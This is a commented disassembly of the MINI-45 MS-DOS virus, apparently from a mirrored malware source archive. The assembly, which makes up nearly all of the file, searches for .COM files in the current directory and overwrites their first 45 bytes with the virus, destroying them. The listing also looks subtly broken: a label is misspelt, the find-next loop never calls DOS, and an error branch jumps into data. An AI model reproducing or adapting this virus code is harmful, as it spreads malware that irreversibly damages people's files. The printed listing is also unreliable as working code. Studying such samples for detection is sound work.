mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-25 00:18:34 +00:00
vxug-MalwareSourceCode/MSDOS/M-Index/Virus.MSDOS.Unknown.mini-45.asm


;***************************************************************
; DISASSEMBLY of the MINI-45 VIRUS
;***************************************************************
; Analyst summary (derived from the instructions below):
;   A 45-byte overwriting .COM infector for MS-DOS. For each file
;   matching '*.com' it opens the file read/write, writes
;   CX=002Dh (45) bytes taken from offset 0100h, and closes it.
;   Nothing here seeks, saves the host's original bytes, or checks
;   for an earlier infection, so the leading 45 bytes of every
;   matched file are replaced and cannot be recovered from the file
;   itself -- affected files have to be restored from known-good
;   copies.
;   The pattern carries no drive or path, so the search is limited
;   to the current directory.
;   Offsets 0100h / 0127h assume the usual .COM load address 0100h.
; NOTE(review): this is a commented disassembly; label spelling and
; jump targets are kept as published and may not match the original
; binary exactly.
;***************************************************************
; FIND .COM FILE TO INFECT
;***************************************************************
MOV DX, 127h ;DS:DX -> ASCIIZ search pattern; 0127h is
;27h bytes past the 0100h load address
;(presumably the FILESPEC data below)
MOV AH, 4Eh ;AH=4Eh: DOS find-first-file
INT 21h ;DOS call; CF set when nothing matches
JB FILESPEC ;CF set -> leave the search path; the
;original annotation calls this "return"
;****************************************************************
; OPEN FILE
;****************************************************************
FIRST_FILE:
MOV DX, 009Eh ;DS:DX -> matched file name: default DTA
;at PSP:0080h + 1Eh (name field filled in
;by find-first / find-next)
MOV AX, 3D02h ;AH=3Dh open file, AL=02h read/write
;access
INT 21h ;DOS call; on success AX = file handle,
;on failure CF is set
JB NEXT_MATCH ;open failed -> skip this file
;****************************************************************
; WRITE VIRUS CODE TO FILE
;****************************************************************
XCHG AX,BX ;BX = file handle (the write and close
;calls below take the handle in BX);
;one-byte encoding of the move
MOV DX, 0100h ;DS:DX -> source buffer = start of the
;running program image, i.e. this code
MOV CX, 002Dh ;byte count 2Dh = 45, hence "mini-45"
MOV AH, 40h ;AH=40h: DOS write-to-handle
INT 21h ;write at the current file position; no
;seek precedes it and the result is not
;checked
;******************************************************************
; CLOSE FILE
;******************************************************************
MOV AH, 3Eh ;AH=3Eh: DOS close-handle (BX unchanged)
INT 21h ;close the modified file
;******************************************************************
; FIND NEXT FILE MATCH
;******************************************************************
NEXT MATCH:
MOV AH, 4Fh ;AH=4Fh selects DOS find-next-file
JMP FIRST_FILE ;loop back (target as labelled in this
;listing)
;******************************************************************
; Search pattern data. The literal '*.com',0 and the INT 21h function
; sequence 4Eh / 3D02h / 40h / 3Eh / 4Fh are the static features
; visible in this listing for identification purposes.
FILESPEC:
db '*.com' ;wildcard pattern, no drive or path
db 00 ;ASCIIZ terminator